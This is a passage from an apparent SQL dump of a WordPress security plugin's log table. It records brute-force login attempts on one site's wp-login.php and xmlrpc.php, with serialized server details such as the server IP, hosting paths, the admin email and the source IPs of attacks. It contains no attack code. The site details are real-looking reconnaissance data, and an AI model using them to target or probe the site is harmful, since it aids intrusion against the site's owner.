07:31:46',18256824,19555648,'https://bintara.com.my/xmlrpc.php',1,0,'103.1.239.217'),(24454,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.132.107\";s:11:\"REMOTE_PORT\";s:5:\"26890\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCNfh@uZ4OC5N1Fn8FdjAAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568705918.7765\";s:12:\"REQUEST_TIME\";s:10:\"1568705918\";}}','notice','2019-09-17 07:38:40','2019-09-17 07:38:39',17741120,19231952,'https://bintara.com.my/wp-login.php',1,0,'37.187.132.107'),(24455,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.132.107\";s:11:\"REMOTE_PORT\";s:5:\"27330\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCNgR@uZ4OC5N1Fn8FdkwAAAIA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568705921.8821\";s:12:\"REQUEST_TIME\";s:10:\"1568705921\";}}','notice','2019-09-17 07:38:43','2019-09-17 07:38:42',18257400,19556376,'https://bintara.com.my/xmlrpc.php',1,0,'37.187.132.107'),(24456,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"57437\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCQVw99C9j9bhK9KplRiwAAAQc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568706647.1999\";s:12:\"REQUEST_TIME\";s:10:\"1568706647\";}}','notice','2019-09-17 07:50:48','2019-09-17 07:50:47',17739552,19230608,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(24457,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"58341\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCQWtK-omY048@iBsM@mQAAANY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568706650.4633\";s:12:\"REQUEST_TIME\";s:10:\"1568706650\";}}','notice','2019-09-17 07:50:52','2019-09-17 07:50:51',18255984,19555976,'https://bintara.com.my/xmlrpc.php',1,0,'213.122.172.69'),(24458,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.72.117\";s:11:\"REMOTE_PORT\";s:5:\"42018\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCRiA99C9j9bhK9KplSKgAAARc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568706952.9748\";s:12:\"REQUEST_TIME\";s:10:\"1568706952\";}}','notice','2019-09-17 07:55:54','2019-09-17 07:55:53',17738496,19230304,'https://bintara.com.my/wp-login.php',1,0,'178.128.72.117'),(24459,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.72.117\";s:11:\"REMOTE_PORT\";s:5:\"42608\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCRix@uZ4OC5N1Fn8FlJwAAAIA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568706955.971\";s:12:\"REQUEST_TIME\";s:10:\"1568706955\";}}','notice','2019-09-17 07:55:57','2019-09-17 07:55:56',18254904,19554728,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.72.117'),(24460,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"13.67.183.43\";s:11:\"REMOTE_PORT\";s:5:\"60072\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCTVh@uZ4OC5N1Fn8FoUgAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568707414.9515\";s:12:\"REQUEST_TIME\";s:10:\"1568707414\";}}','notice','2019-09-17 08:03:36','2019-09-17 08:03:35',17738880,19229824,'https://bintara.com.my/wp-login.php',1,0,'13.67.183.43'),(24461,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"13.67.183.43\";s:11:\"REMOTE_PORT\";s:5:\"32780\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCTWrIp53uPsY7BKArfBwAAAFg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568707418.3098\";s:12:\"REQUEST_TIME\";s:10:\"1568707418\";}}','notice','2019-09-17 08:03:39','2019-09-17 08:03:38',18257184,19554176,'https://bintara.com.my/xmlrpc.php',1,0,'13.67.183.43'),(24462,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.9.147.200\";s:11:\"REMOTE_PORT\";s:5:\"53858\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCTox@uZ4OC5N1Fn8FolAAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568707491.4757\";s:12:\"REQUEST_TIME\";s:10:\"1568707491\";}}','notice','2019-09-17 08:04:53','2019-09-17 